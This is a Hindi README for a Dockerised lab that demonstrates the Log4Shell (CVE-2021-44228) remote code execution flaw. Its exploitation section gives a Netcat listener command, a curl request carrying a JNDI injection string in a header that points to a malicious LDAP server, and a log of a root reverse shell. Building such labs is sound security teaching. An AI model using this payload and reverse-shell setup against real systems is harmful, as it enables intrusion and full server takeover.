
Log4Shell (CVE-2021-44228) भेद्यता का ऑडिट करने और अध्ययन करने के लिए Docker में स्वचालित प्लग एंड प्ले प्रयोगशाला
Log4Shell (CVE-2021-44228) रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को प्रदर्शित करने और ऑडिट करने के लिए डिज़ाइन की गई एक स्वचालित, सिंगल-कमांड सुरक्षा अनुसंधान प्रयोगशाला।
यह परियोजना सभी आवश्यक घटकों (भेद्य अनुप्रयोग, दुर्भावनापूर्ण LDAP रेफरल सर्वर, और हमलावर उपकरण) को Docker Compose का उपयोग करके एक एकीकृत, पृथक नेटवर्क अवसंरचना में समेकित करती है।
.env फ़ाइल संपादन, या नेटवर्क संरेखण आवश्यक नहीं है। सब कुछ Docker के आंतरिक DNS के माध्यम से स्वचालित रूप से हल हो जाता है।UnsupportedClassVersionError समस्याएँ समाप्त हो जाती हैं।configurar.sh) द्वारा नियंत्रित, जो कंटेनर टियरडाउन, कैश सफ़ाई, और पुनर्निर्माण को स्वचालित करता है।प्रयोगशाला तीन प्रमुख अभिनेताओं के साथ एक पृथक ब्रिज नेटवर्क (red-log4shell) बनाती है:
web-vulnerable): एक Spring Boot वेब एप्लिकेशन जो Log4j के एक अनपैच्ड, भेद्य संस्करण (2.14.1) का उपयोग करता है और Java 8u111 पर चलता है।ldap-malicioso): आने वाले लुकअप अनुरोधों को रोकने और पीड़ित को गतिशील रूप से हमलावर के पेलोड पर रीडायरेक्ट करने के लिए marshalsec द्वारा संचालित।kali-tools): एक कस्टम Kali Linux कंटेनर जो संकलित एक्सप्लॉइट पेलोड (Exploit.class) को वितरित करने के लिए एक Python HTTP सर्वर और रिवर्स शेल को पकड़ने के लिए एक Netcat लिसनर होस्ट करता है।Docker स्थापित किसी भी Linux मशीन पर इस प्रयोगशाला को तैनात करने के लिए, अपने टर्मिनल में निम्नलिखित कमांड चलाएँ:
# 1. रिपॉजिटरी क्लोन करें
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git
# 2. प्रोजेक्ट निर्देशिका में जाएँ
cd mi-laboratorio-log4shell
# 3. स्क्रिप्ट मैनेजर को निष्पादन अनुमतियाँ दें और प्रयोगशाला लॉन्च करें
chmod +x configurar.sh
./configurar.sh
🚀 एक्सप्लॉइट कैसे करें (चरण-दर-चरण)
एक बार स्क्रिप्ट के माध्यम से अवसंरचना स्वचालित रूप से चालू हो जाने पर, रिवर्स शेल को ट्रिगर करने और कैप्चर करने के लिए इन चरणों का पालन करें। चरण 1: Netcat लिसनर सेट अप करें
अपनी होस्ट मशीन (Ubuntu) पर एक नया टर्मिनल खोलें और आने वाले कनेक्शनों के लिए Netcat को स्टैंडबाय पर रखने हेतु हमलावर के कंटेनर से जुड़ें: Bash
sudo docker exec -it kali-tools bash
Kali कंटेनर के अंदर, लिसनर शुरू करें: Bash
nc -lvnp 4444
आपको संदेश दिखाई देगा: listening on [any] 4444 ... चरण 2: हमला वेक्टर लॉन्च करें
अपनी होस्ट मशीन पर एक अलग टर्मिनल खोलें और X-Api-Version हेडर के भीतर एम्बेडेड दुर्भावनापूर्ण JNDI इंजेक्शन स्ट्रिंग भेजें:
Bash
curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'
चरण 3: रिवर्स शेल सत्यापित करें
अपने Netcat टर्मिनल पर वापस जाएँ। आपको एक सक्रिय कनेक्शन दिखाई देना चाहिए। अब आप पीड़ित सर्वर के अंदर रूट के रूप में कमांड निष्पादित कर सकते हैं: Bash
connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164 whoami root
यह रिपॉजिटरी पूर्ण रूप से शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान, और अधिकृत शैक्षणिक ऑडिटिंग के लिए बनाई गई है। अवसंरचना स्वामियों से स्पष्ट, पूर्व लिखित प्राधिकरण के बिना इन उपकरणों या हमले अवसंरचना को कभी निष्पादित न करें।